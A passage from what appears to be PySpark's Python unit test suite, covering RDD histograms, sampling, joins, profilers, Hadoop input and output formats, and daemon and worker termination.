range with two buckets rdd = self.sc.parallelize([10.01, -0.01]) self.assertEqual([0, 0], rdd.histogram([0, 5, 10])[1]) # out of range with two uneven buckets rdd = self.sc.parallelize([10.01, -0.01]) self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1]) # in range with two buckets rdd = self.sc.parallelize([1, 2, 3, 5, 6]) self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1]) # in range with two bucket and None rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')]) self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1]) # in range with two uneven buckets rdd = self.sc.parallelize([1, 2, 3, 5, 6]) self.assertEqual([3, 2], rdd.histogram([0, 5, 11])[1]) # mixed range with two uneven buckets rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01]) self.assertEqual([4, 3], rdd.histogram([0, 5, 11])[1]) # mixed range with four uneven buckets rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1]) self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1]) # mixed range with uneven buckets and NaN rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1, None, float('nan')]) self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1]) # out of range with infinite buckets rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")]) self.assertEqual([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1]) # invalid buckets self.assertRaises(ValueError, lambda: rdd.histogram([])) self.assertRaises(ValueError, lambda: rdd.histogram([1])) self.assertRaises(ValueError, lambda: rdd.histogram(0)) self.assertRaises(TypeError, lambda: rdd.histogram({})) # without buckets rdd = self.sc.parallelize(range(1, 5)) self.assertEqual(([1, 4], [4]), rdd.histogram(1)) # without buckets single element rdd = self.sc.parallelize([1]) self.assertEqual(([1, 1], [1]), rdd.histogram(1)) # without bucket no range rdd = self.sc.parallelize([1] * 4) self.assertEqual(([1, 1], [4]), rdd.histogram(1)) # without buckets basic two rdd = self.sc.parallelize(range(1, 5)) self.assertEqual(([1, 2.5, 4], [2, 2]), rdd.histogram(2)) # without buckets with more requested than elements rdd = self.sc.parallelize([1, 2]) buckets = [1 + 0.2 * i for i in range(6)] hist = [1, 0, 0, 0, 1] self.assertEqual((buckets, hist), rdd.histogram(5)) # invalid RDDs rdd = self.sc.parallelize([1, float('inf')]) self.assertRaises(ValueError, lambda: rdd.histogram(2)) rdd = self.sc.parallelize([float('nan')]) self.assertRaises(ValueError, lambda: rdd.histogram(2)) # string rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2) self.assertEqual([2, 2], rdd.histogram(["a", "b", "c"])[1]) self.assertEqual((["ab", "ef"], [5]), rdd.histogram(1)) self.assertRaises(TypeError, lambda: rdd.histogram(2)) def test_repartitionAndSortWithinPartitions(self): rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2) repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2) partitions = repartitioned.glom().collect() self.assertEqual(partitions[0], [(0, 5), (0, 8), (2, 6)]) self.assertEqual(partitions[1], [(1, 3), (3, 8), (3, 8)]) def test_distinct(self): rdd = self.sc.parallelize((1, 2, 3)*10, 10) self.assertEqual(rdd.getNumPartitions(), 10) self.assertEqual(rdd.distinct().count(), 3) result = rdd.distinct(5) self.assertEqual(result.getNumPartitions(), 5) self.assertEqual(result.count(), 3) def test_external_group_by_key(self): self.sc._conf.set("spark.python.worker.memory", "1m") N = 200001 kv = self.sc.parallelize(range(N)).map(lambda x: (x % 3, x)) gkv = kv.groupByKey().cache() self.assertEqual(3, gkv.count()) filtered = gkv.filter(lambda kv: kv[0] == 1) self.assertEqual(1, filtered.count()) self.assertEqual([(1, N // 3)], filtered.mapValues(len).collect()) self.assertEqual([(N // 3, N // 3)], filtered.values().map(lambda x: (len(x), len(list(x)))).collect()) result = filtered.collect()[0][1] self.assertEqual(N // 3, len(result)) self.assertTrue(isinstance(result.data, shuffle.ExternalListOfList)) def test_sort_on_empty_rdd(self): self.assertEqual([], self.sc.parallelize(zip([], [])).sortByKey().collect()) def test_sample(self): rdd = self.sc.parallelize(range(0, 100), 4) wo = rdd.sample(False, 0.1, 2).collect() wo_dup = rdd.sample(False, 0.1, 2).collect() self.assertSetEqual(set(wo), set(wo_dup)) wr = rdd.sample(True, 0.2, 5).collect() wr_dup = rdd.sample(True, 0.2, 5).collect() self.assertSetEqual(set(wr), set(wr_dup)) wo_s10 = rdd.sample(False, 0.3, 10).collect() wo_s20 = rdd.sample(False, 0.3, 20).collect() self.assertNotEqual(set(wo_s10), set(wo_s20)) wr_s11 = rdd.sample(True, 0.4, 11).collect() wr_s21 = rdd.sample(True, 0.4, 21).collect() self.assertNotEqual(set(wr_s11), set(wr_s21)) def test_null_in_rdd(self): jrdd = self.sc._jvm.PythonUtils.generateRDDWithNull(self.sc._jsc) rdd = RDD(jrdd, self.sc, UTF8Deserializer()) self.assertEqual([u"a", None, u"b"], rdd.collect()) rdd = RDD(jrdd, self.sc, NoOpSerializer()) self.assertEqual([b"a", None, b"b"], rdd.collect()) def test_multiple_python_java_RDD_conversions(self): # Regression test for SPARK-5361 data = [ (u'1', {u'director': u'David Lean'}), (u'2', {u'director': u'Andrew Dominik'}) ] data_rdd = self.sc.parallelize(data) data_java_rdd = data_rdd._to_java_object_rdd() data_python_rdd = self.sc._jvm.SerDe.javaToPython(data_java_rdd) converted_rdd = RDD(data_python_rdd, self.sc) self.assertEqual(2, converted_rdd.count()) # conversion between python and java RDD threw exceptions data_java_rdd = converted_rdd._to_java_object_rdd() data_python_rdd = self.sc._jvm.SerDe.javaToPython(data_java_rdd) converted_rdd = RDD(data_python_rdd, self.sc) self.assertEqual(2, converted_rdd.count()) def test_narrow_dependency_in_join(self): rdd = self.sc.parallelize(range(10)).map(lambda x: (x, x)) parted = rdd.partitionBy(2) self.assertEqual(2, parted.union(parted).getNumPartitions()) self.assertEqual(rdd.getNumPartitions() + 2, parted.union(rdd).getNumPartitions()) self.assertEqual(rdd.getNumPartitions() + 2, rdd.union(parted).getNumPartitions()) tracker = self.sc.statusTracker() self.sc.setJobGroup("test1", "test", True) d = sorted(parted.join(parted).collect()) self.assertEqual(10, len(d)) self.assertEqual((0, (0, 0)), d[0]) jobId = tracker.getJobIdsForGroup("test1")[0] self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds)) self.sc.setJobGroup("test2", "test", True) d = sorted(parted.join(rdd).collect()) self.assertEqual(10, len(d)) self.assertEqual((0, (0, 0)), d[0]) jobId = tracker.getJobIdsForGroup("test2")[0] self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds)) self.sc.setJobGroup("test3", "test", True) d = sorted(parted.cogroup(parted).collect()) self.assertEqual(10, len(d)) self.assertEqual([[0], [0]], list(map(list, d[0][1]))) jobId = tracker.getJobIdsForGroup("test3")[0] self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds)) self.sc.setJobGroup("test4", "test", True) d = sorted(parted.cogroup(rdd).collect()) self.assertEqual(10, len(d)) self.assertEqual([[0], [0]], list(map(list, d[0][1]))) jobId = tracker.getJobIdsForGroup("test4")[0] self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds)) # Regression test for SPARK-6294 def test_take_on_jrdd(self): rdd = self.sc.parallelize(range(1 << 20)).map(lambda x: str(x)) rdd._jrdd.first() def test_sortByKey_uses_all_partitions_not_only_first_and_last(self): # Regression test for SPARK-5969 seq = [(i * 59 % 101, i) for i in range(101)] # unsorted sequence rdd = self.sc.parallelize(seq) for ascending in [True, False]: sort = rdd.sortByKey(ascending=ascending, numPartitions=5) self.assertEqual(sort.collect(), sorted(seq, reverse=not ascending)) sizes = sort.glom().map(len).collect() for size in sizes: self.assertGreater(size, 0) class ProfilerTests(PySparkTestCase): def setUp(self): self._old_sys_path = list(sys.path) class_name = self.__class__.__name__ conf = SparkConf().set("spark.python.profile", "true") self.sc = SparkContext('local[4]', class_name, conf=conf) def test_profiler(self): self.do_computation() profilers = self.sc.profiler_collector.profilers self.assertEqual(1, len(profilers)) id, profiler, _ = profilers[0] stats = profiler.stats() self.assertTrue(stats is not None) width, stat_list = stats.get_print_list([]) func_names = [func_name for fname, n, func_name in stat_list] self.assertTrue("heavy_foo" in func_names) old_stdout = sys.stdout sys.stdout = io = StringIO() self.sc.show_profiles() self.assertTrue("heavy_foo" in io.getvalue()) sys.stdout = old_stdout d = tempfile.gettempdir() self.sc.dump_profiles(d) self.assertTrue("rdd_%d.pstats" % id in os.listdir(d)) def test_custom_profiler(self): class TestCustomProfiler(BasicProfiler): def show(self, id): self.result = "Custom formatting" self.sc.profiler_collector.profiler_cls = TestCustomProfiler self.do_computation() profilers = self.sc.profiler_collector.profilers self.assertEqual(1, len(profilers)) _, profiler, _ = profilers[0] self.assertTrue(isinstance(profiler, TestCustomProfiler)) self.sc.show_profiles() self.assertEqual("Custom formatting", profiler.result) def do_computation(self): def heavy_foo(x): for i in range(1 << 18): x = 1 rdd = self.sc.parallelize(range(100)) rdd.foreach(heavy_foo) class InputFormatTests(ReusedPySparkTestCase): @classmethod def setUpClass(cls): ReusedPySparkTestCase.setUpClass() cls.tempdir = tempfile.NamedTemporaryFile(delete=False) os.unlink(cls.tempdir.name) cls.sc._jvm.WriteInputFormatTestDataGenerator.generateData(cls.tempdir.name, cls.sc._jsc) @classmethod def tearDownClass(cls): ReusedPySparkTestCase.tearDownClass() shutil.rmtree(cls.tempdir.name) @unittest.skipIf(sys.version >= "3", "serialize array of byte") def test_sequencefiles(self): basepath = self.tempdir.name ints = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfint/", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.Text").collect()) ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')] self.assertEqual(ints, ei) doubles = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfdouble/", "org.apache.hadoop.io.DoubleWritable", "org.apache.hadoop.io.Text").collect()) ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')] self.assertEqual(doubles, ed) bytes = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbytes/", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.BytesWritable").collect()) ebs = [(1, bytearray('aa', 'utf-8')), (1, bytearray('aa', 'utf-8')), (2, bytearray('aa', 'utf-8')), (2, bytearray('bb', 'utf-8')), (2, bytearray('bb', 'utf-8')), (3, bytearray('cc', 'utf-8'))] self.assertEqual(bytes, ebs) text = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sftext/", "org.apache.hadoop.io.Text", "org.apache.hadoop.io.Text").collect()) et = [(u'1', u'aa'), (u'1', u'aa'), (u'2', u'aa'), (u'2', u'bb'), (u'2', u'bb'), (u'3', u'cc')] self.assertEqual(text, et) bools = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbool/", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.BooleanWritable").collect()) eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)] self.assertEqual(bools, eb) nulls = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfnull/", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.BooleanWritable").collect()) en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)] self.assertEqual(nulls, en) maps = self.sc.sequenceFile(basepath + "/sftestdata/sfmap/", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.MapWritable").collect() em = [(1, {}), (1, {3.0: u'bb'}), (2, {1.0: u'aa'}), (2, {1.0: u'cc'}), (3, {2.0: u'dd'})] for v in maps: self.assertTrue(v in em) # arrays get pickled to tuples by default tuples = sorted(self.sc.sequenceFile( basepath + "/sftestdata/sfarray/", "org.apache.hadoop.io.IntWritable", "org.apache.spark.api.python.DoubleArrayWritable").collect()) et = [(1, ()), (2, (3.0, 4.0, 5.0)), (3, (4.0, 5.0, 6.0))] self.assertEqual(tuples, et) # with custom converters, primitive arrays can stay as arrays arrays = sorted(self.sc.sequenceFile( basepath + "/sftestdata/sfarray/", "org.apache.hadoop.io.IntWritable", "org.apache.spark.api.python.DoubleArrayWritable", valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect()) ea = [(1, array('d')), (2, array('d', [3.0, 4.0, 5.0])), (3, array('d', [4.0, 5.0, 6.0]))] self.assertEqual(arrays, ea) clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/", "org.apache.hadoop.io.Text", "org.apache.spark.api.python.TestWritable").collect()) cname = u'org.apache.spark.api.python.TestWritable' ec = [(u'1', {u'__class__': cname, u'double': 1.0, u'int': 1, u'str': u'test1'}), (u'2', {u'__class__': cname, u'double': 2.3, u'int': 2, u'str': u'test2'}), (u'3', {u'__class__': cname, u'double': 3.1, u'int': 3, u'str': u'test3'}), (u'4', {u'__class__': cname, u'double': 4.2, u'int': 4, u'str': u'test4'}), (u'5', {u'__class__': cname, u'double': 5.5, u'int': 5, u'str': u'test56'})] self.assertEqual(clazz, ec) unbatched_clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/", "org.apache.hadoop.io.Text", "org.apache.spark.api.python.TestWritable", ).collect()) self.assertEqual(unbatched_clazz, ec) def test_oldhadoop(self): basepath = self.tempdir.name ints = sorted(self.sc.hadoopFile(basepath + "/sftestdata/sfint/", "org.apache.hadoop.mapred.SequenceFileInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.Text").collect()) ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')] self.assertEqual(ints, ei) hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt") oldconf = {"mapred.input.dir": hellopath} hello = self.sc.hadoopRDD("org.apache.hadoop.mapred.TextInputFormat", "org.apache.hadoop.io.LongWritable", "org.apache.hadoop.io.Text", conf=oldconf).collect() result = [(0, u'Hello World!')] self.assertEqual(hello, result) def test_newhadoop(self): basepath = self.tempdir.name ints = sorted(self.sc.newAPIHadoopFile( basepath + "/sftestdata/sfint/", "org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.Text").collect()) ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')] self.assertEqual(ints, ei) hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt") newconf = {"mapred.input.dir": hellopath} hello = self.sc.newAPIHadoopRDD("org.apache.hadoop.mapreduce.lib.input.TextInputFormat", "org.apache.hadoop.io.LongWritable", "org.apache.hadoop.io.Text", conf=newconf).collect() result = [(0, u'Hello World!')] self.assertEqual(hello, result) def test_newolderror(self): basepath = self.tempdir.name self.assertRaises(Exception, lambda: self.sc.hadoopFile( basepath + "/sftestdata/sfint/", "org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.Text")) self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile( basepath + "/sftestdata/sfint/", "org.apache.hadoop.mapred.SequenceFileInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.Text")) def test_bad_inputs(self): basepath = self.tempdir.name self.assertRaises(Exception, lambda: self.sc.sequenceFile( basepath + "/sftestdata/sfint/", "org.apache.hadoop.io.NotValidWritable", "org.apache.hadoop.io.Text")) self.assertRaises(Exception, lambda: self.sc.hadoopFile( basepath + "/sftestdata/sfint/", "org.apache.hadoop.mapred.NotValidInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.Text")) self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile( basepath + "/sftestdata/sfint/", "org.apache.hadoop.mapreduce.lib.input.NotValidInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.Text")) def test_converters(self): # use of custom converters basepath = self.tempdir.name maps = sorted(self.sc.sequenceFile( basepath + "/sftestdata/sfmap/", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.MapWritable", keyConverter="org.apache.spark.api.python.TestInputKeyConverter", valueConverter="org.apache.spark.api.python.TestInputValueConverter").collect()) em = [(u'\x01', []), (u'\x01', [3.0]), (u'\x02', [1.0]), (u'\x02', [1.0]), (u'\x03', [2.0])] self.assertEqual(maps, em) def test_binary_files(self): path = os.path.join(self.tempdir.name, "binaryfiles") os.mkdir(path) data = b"short binary data" with open(os.path.join(path, "part-0000"), 'wb') as f: f.write(data) [(p, d)] = self.sc.binaryFiles(path).collect() self.assertTrue(p.endswith("part-0000")) self.assertEqual(d, data) def test_binary_records(self): path = os.path.join(self.tempdir.name, "binaryrecords") os.mkdir(path) with open(os.path.join(path, "part-0000"), 'w') as f: for i in range(100): f.write('%04d' % i) result = self.sc.binaryRecords(path, 4).map(int).collect() self.assertEqual(list(range(100)), result) class OutputFormatTests(ReusedPySparkTestCase): def setUp(self): self.tempdir = tempfile.NamedTemporaryFile(delete=False) os.unlink(self.tempdir.name) def tearDown(self): shutil.rmtree(self.tempdir.name, ignore_errors=True) @unittest.skipIf(sys.version >= "3", "serialize array of byte") def test_sequencefiles(self): basepath = self.tempdir.name ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')] self.sc.parallelize(ei).saveAsSequenceFile(basepath + "/sfint/") ints = sorted(self.sc.sequenceFile(basepath + "/sfint/").collect()) self.assertEqual(ints, ei) ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')] self.sc.parallelize(ed).saveAsSequenceFile(basepath + "/sfdouble/") doubles = sorted(self.sc.sequenceFile(basepath + "/sfdouble/").collect()) self.assertEqual(doubles, ed) ebs = [(1, bytearray(b'\x00\x07spam\x08')), (2, bytearray(b'\x00\x07spam\x08'))] self.sc.parallelize(ebs).saveAsSequenceFile(basepath + "/sfbytes/") bytes = sorted(self.sc.sequenceFile(basepath + "/sfbytes/").collect()) self.assertEqual(bytes, ebs) et = [(u'1', u'aa'), (u'2', u'bb'), (u'3', u'cc')] self.sc.parallelize(et).saveAsSequenceFile(basepath + "/sftext/") text = sorted(self.sc.sequenceFile(basepath + "/sftext/").collect()) self.assertEqual(text, et) eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)] self.sc.parallelize(eb).saveAsSequenceFile(basepath + "/sfbool/") bools = sorted(self.sc.sequenceFile(basepath + "/sfbool/").collect()) self.assertEqual(bools, eb) en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)] self.sc.parallelize(en).saveAsSequenceFile(basepath + "/sfnull/") nulls = sorted(self.sc.sequenceFile(basepath + "/sfnull/").collect()) self.assertEqual(nulls, en) em = [(1, {}), (1, {3.0: u'bb'}), (2, {1.0: u'aa'}), (2, {1.0: u'cc'}), (3, {2.0: u'dd'})] self.sc.parallelize(em).saveAsSequenceFile(basepath + "/sfmap/") maps = self.sc.sequenceFile(basepath + "/sfmap/").collect() for v in maps: self.assertTrue(v, em) def test_oldhadoop(self): basepath = self.tempdir.name dict_data = [(1, {}), (1, {"row1": 1.0}), (2, {"row2": 2.0})] self.sc.parallelize(dict_data).saveAsHadoopFile( basepath + "/oldhadoop/", "org.apache.hadoop.mapred.SequenceFileOutputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.MapWritable") result = self.sc.hadoopFile( basepath + "/oldhadoop/", "org.apache.hadoop.mapred.SequenceFileInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.MapWritable").collect() for v in result: self.assertTrue(v, dict_data) conf = { "mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat", "mapred.output.key.class": "org.apache.hadoop.io.IntWritable", "mapred.output.value.class": "org.apache.hadoop.io.MapWritable", "mapred.output.dir": basepath + "/olddataset/" } self.sc.parallelize(dict_data).saveAsHadoopDataset(conf) input_conf = {"mapred.input.dir": basepath + "/olddataset/"} result = self.sc.hadoopRDD( "org.apache.hadoop.mapred.SequenceFileInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.MapWritable", conf=input_conf).collect() for v in result: self.assertTrue(v, dict_data) def test_newhadoop(self): basepath = self.tempdir.name data = [(1, ""), (1, "a"), (2, "bcdf")] self.sc.parallelize(data).saveAsNewAPIHadoopFile( basepath + "/newhadoop/", "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.Text") result = sorted(self.sc.newAPIHadoopFile( basepath + "/newhadoop/", "org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.Text").collect()) self.assertEqual(result, data) conf = { "mapreduce.outputformat.class": "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat", "mapred.output.key.class": "org.apache.hadoop.io.IntWritable", "mapred.output.value.class": "org.apache.hadoop.io.Text", "mapred.output.dir": basepath + "/newdataset/" } self.sc.parallelize(data).saveAsNewAPIHadoopDataset(conf) input_conf = {"mapred.input.dir": basepath + "/newdataset/"} new_dataset = sorted(self.sc.newAPIHadoopRDD( "org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.Text", conf=input_conf).collect()) self.assertEqual(new_dataset, data) @unittest.skipIf(sys.version >= "3", "serialize of array") def test_newhadoop_with_array(self): basepath = self.tempdir.name # use custom ArrayWritable types and converters to handle arrays array_data = [(1, array('d')), (1, array('d', [1.0, 2.0, 3.0])), (2, array('d', [3.0, 4.0, 5.0]))] self.sc.parallelize(array_data).saveAsNewAPIHadoopFile( basepath + "/newhadoop/", "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.spark.api.python.DoubleArrayWritable", valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter") result = sorted(self.sc.newAPIHadoopFile( basepath + "/newhadoop/", "org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.spark.api.python.DoubleArrayWritable", valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect()) self.assertEqual(result, array_data) conf = { "mapreduce.outputformat.class": "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat", "mapred.output.key.class": "org.apache.hadoop.io.IntWritable", "mapred.output.value.class": "org.apache.spark.api.python.DoubleArrayWritable", "mapred.output.dir": basepath + "/newdataset/" } self.sc.parallelize(array_data).saveAsNewAPIHadoopDataset( conf, valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter") input_conf = {"mapred.input.dir": basepath + "/newdataset/"} new_dataset = sorted(self.sc.newAPIHadoopRDD( "org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.spark.api.python.DoubleArrayWritable", valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter", conf=input_conf).collect()) self.assertEqual(new_dataset, array_data) def test_newolderror(self): basepath = self.tempdir.name rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x)) self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile( basepath + "/newolderror/saveAsHadoopFile/", "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")) self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile( basepath + "/newolderror/saveAsNewAPIHadoopFile/", "org.apache.hadoop.mapred.SequenceFileOutputFormat")) def test_bad_inputs(self): basepath = self.tempdir.name rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x)) self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile( basepath + "/badinputs/saveAsHadoopFile/", "org.apache.hadoop.mapred.NotValidOutputFormat")) self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile( basepath + "/badinputs/saveAsNewAPIHadoopFile/", "org.apache.hadoop.mapreduce.lib.output.NotValidOutputFormat")) def test_converters(self): # use of custom converters basepath = self.tempdir.name data = [(1, {3.0: u'bb'}), (2, {1.0: u'aa'}), (3, {2.0: u'dd'})] self.sc.parallelize(data).saveAsNewAPIHadoopFile( basepath + "/converters/", "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat", keyConverter="org.apache.spark.api.python.TestOutputKeyConverter", valueConverter="org.apache.spark.api.python.TestOutputValueConverter") converted = sorted(self.sc.sequenceFile(basepath + "/converters/").collect()) expected = [(u'1', 3.0), (u'2', 1.0), (u'3', 2.0)] self.assertEqual(converted, expected) def test_reserialization(self): basepath = self.tempdir.name x = range(1, 5) y = range(1001, 1005) data = list(zip(x, y)) rdd = self.sc.parallelize(x).zip(self.sc.parallelize(y)) rdd.saveAsSequenceFile(basepath + "/reserialize/sequence") result1 = sorted(self.sc.sequenceFile(basepath + "/reserialize/sequence").collect()) self.assertEqual(result1, data) rdd.saveAsHadoopFile( basepath + "/reserialize/hadoop", "org.apache.hadoop.mapred.SequenceFileOutputFormat") result2 = sorted(self.sc.sequenceFile(basepath + "/reserialize/hadoop").collect()) self.assertEqual(result2, data) rdd.saveAsNewAPIHadoopFile( basepath + "/reserialize/newhadoop", "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat") result3 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newhadoop").collect()) self.assertEqual(result3, data) conf4 = { "mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat", "mapred.output.key.class": "org.apache.hadoop.io.IntWritable", "mapred.output.value.class": "org.apache.hadoop.io.IntWritable", "mapred.output.dir": basepath + "/reserialize/dataset"} rdd.saveAsHadoopDataset(conf4) result4 = sorted(self.sc.sequenceFile(basepath + "/reserialize/dataset").collect()) self.assertEqual(result4, data) conf5 = {"mapreduce.outputformat.class": "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat", "mapred.output.key.class": "org.apache.hadoop.io.IntWritable", "mapred.output.value.class": "org.apache.hadoop.io.IntWritable", "mapred.output.dir": basepath + "/reserialize/newdataset"} rdd.saveAsNewAPIHadoopDataset(conf5) result5 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newdataset").collect()) self.assertEqual(result5, data) def test_malformed_RDD(self): basepath = self.tempdir.name # non-batch-serialized RDD[[(K, V)]] should be rejected data = [[(1, "a")], [(2, "aa")], [(3, "aaa")]] rdd = self.sc.parallelize(data, len(data)) self.assertRaises(Exception, lambda: rdd.saveAsSequenceFile( basepath + "/malformed/sequence")) class DaemonTests(unittest.TestCase): def connect(self, port): from socket import socket, AF_INET, SOCK_STREAM sock = socket(AF_INET, SOCK_STREAM) sock.connect(('127.0.0.1', port)) # send a split index of -1 to shutdown the worker sock.send(b"\xFF\xFF\xFF\xFF") sock.close() return True def do_termination_test(self, terminator): from subprocess import Popen, PIPE from errno import ECONNREFUSED # start daemon daemon_path = os.path.join(os.path.dirname(__file__), "daemon.py") daemon = Popen([sys.executable, daemon_path], stdin=PIPE, stdout=PIPE) # read the port number port = read_int(daemon.stdout) # daemon should accept connections self.assertTrue(self.connect(port)) # request shutdown terminator(daemon) time.sleep(1) # daemon should no longer accept connections try: self.connect(port) except EnvironmentError as exception: self.assertEqual(exception.errno, ECONNREFUSED) else: self.fail("Expected EnvironmentError to be raised") def test_termination_stdin(self): """Ensure that daemon and workers terminate when stdin is closed.""" self.do_termination_test(lambda daemon: daemon.stdin.close()) def test_termination_sigterm(self): """Ensure that daemon and workers terminate on SIGTERM.""" from signal import SIGTERM self.do_termination_test(lambda daemon: os.kill(daemon.pid, SIGTERM)) class WorkerTests(ReusedPySparkTestCase): def test_cancel_task(self): temp = tempfile.NamedTemporaryFile(delete=True) temp.close() path = temp.name def sleep(x): import os import time with open(path, 'w') as f: f.write("%d %d" % (os.getppid(), os.getpid())) time.sleep(100) # start job in background thread def run(): try: self.sc.parallelize(range(1), 1).foreach(sleep) except Exception: pass import threading t = threading.Thread(target=run) t.daemon = True t.start() daemon_pid, worker_pid = 0, 0 while True: if os.path.exists(path): with open(path) as f: data = f.read().split(' ') daemon_pid, worker_pid = map(int, data) break time.sleep(0.1) # cancel jobs self.sc.cancelAllJobs() t.join() for i in range(50): try: os.kill(worker_pid, 0) time.sleep(0.1) except OSError: break # worker was killed else: self.fail("worker has not been killed after 5 seconds") try: os.kill(daemon_pid, 0) except OSError: self.fail("daemon had been killed") # run a normal job rdd = self.sc.parallelize(range(100), 1) self.assertEqual(100, rdd.map(str).count()) def test_after_exception(self): def raise_exception(_): raise Exception() rdd = self.sc.parallelize(range(100), 1) with QuietTest(self.sc): self.assertRaises(Exception, lambda: rdd.foreach(raise_exception)) self.assertEqual(100, rdd.map(str).count()) def test_after_jvm_exception(self): tempFile = tempfile.NamedTemporaryFile(delete=False) tempFile.write(b"Hello World!") tempFile.close() data = self.sc.textFile(tempFile.name, 1) filtered_data = data.filter(lambda x: True) self.assertEqual(1, filtered_data.count()) os.unlink(tempFile.name) with QuietTest(self.sc): self.assertRaises(Exception, lambda: filtered_data.count()) rdd = self.sc.parallelize(range(100), 1) self.assertEqual(100, rdd.map(str).count()) def test_accumulator_when_reuse_worker(self): from pyspark.accumulators import INT_ACCUMULATOR_PARAM acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM) 